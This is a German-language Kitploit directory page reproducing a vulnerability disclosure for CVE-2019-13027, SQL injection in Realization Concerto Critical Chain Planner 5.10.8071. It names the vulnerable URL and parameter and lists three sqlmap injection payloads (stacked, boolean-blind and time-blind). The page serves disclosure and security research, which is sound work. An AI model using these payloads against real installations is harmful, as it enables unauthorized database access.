Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-13027 — Details zur Offenlegung von CVE-2019-13027 | Kitploit
Tools/GitHubGitHub/ickogz/cve-2019-13027
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubickogz/cve-2019-13027

CVE-2019-13027

Details zur Offenlegung von CVE-2019-13027

Repository anzeigen
1vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-13027

Details zur Offenlegung von CVE-2019-13027

Zeitplan des Kontakts mit dem Anbieter:

  1. Juli 2019 -> Keine Antwort, keine E-Mail.

  2. Juli 2019 -> Keine Antwort, keine E-Mail.

  3. Juli 2019 -> E-Mail gesendet, GitHub erstellt.

  4. Juli 2019 -> Keine Antwort des Anbieters. Schwachstelle offengelegt.

[Verwundbarkeitstyp] SQL Injection [Betroffene Produktcodebasis] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Andere Versionen im 5.x-Zweig sind wahrscheinlich betroffen. Kann nicht mit >anderen Zweigen getestet werden)

[Betroffene Komponente] Realization Concerto Critical Chain Planner (auch bekannt als CCPM) 5.10.8071 weist einige kritische Sicherheitsprobleme auf, darunter SQL-Injection mindestens in der Webseite taskupdt/taskdetails.aspx über den Parameter "projectname"


[Angriffstyp] Remote

[Angriffsvektoren] Die Anwendung hat viele reflektierte XSS/CSRF (z. B. in checklist/checklist), aber der knifflige Teil sind die SQL-Injections. Je nach SQL Server-Version und/oder IDS/IPS ist etwas Manipulation erforderlich.

URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined

ProjectName (foo) muss existieren und gültig sein. Fuzze die restlichen Parameter (oder verwende eine echte Anfrage). foo hat auch ein XSS

Erkanntes SQL (Payloads von SQLMAP) Parameter: projectname (GET)

root@kitploit:~
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: projectname=foo';WAITFOR DELAY '0:0:5'--

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: projectname=foo' AND 3676=3676-- 

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 

[Anbieter des Produkts] REALIZATION - https://www.realization.com/

Tool herunterladen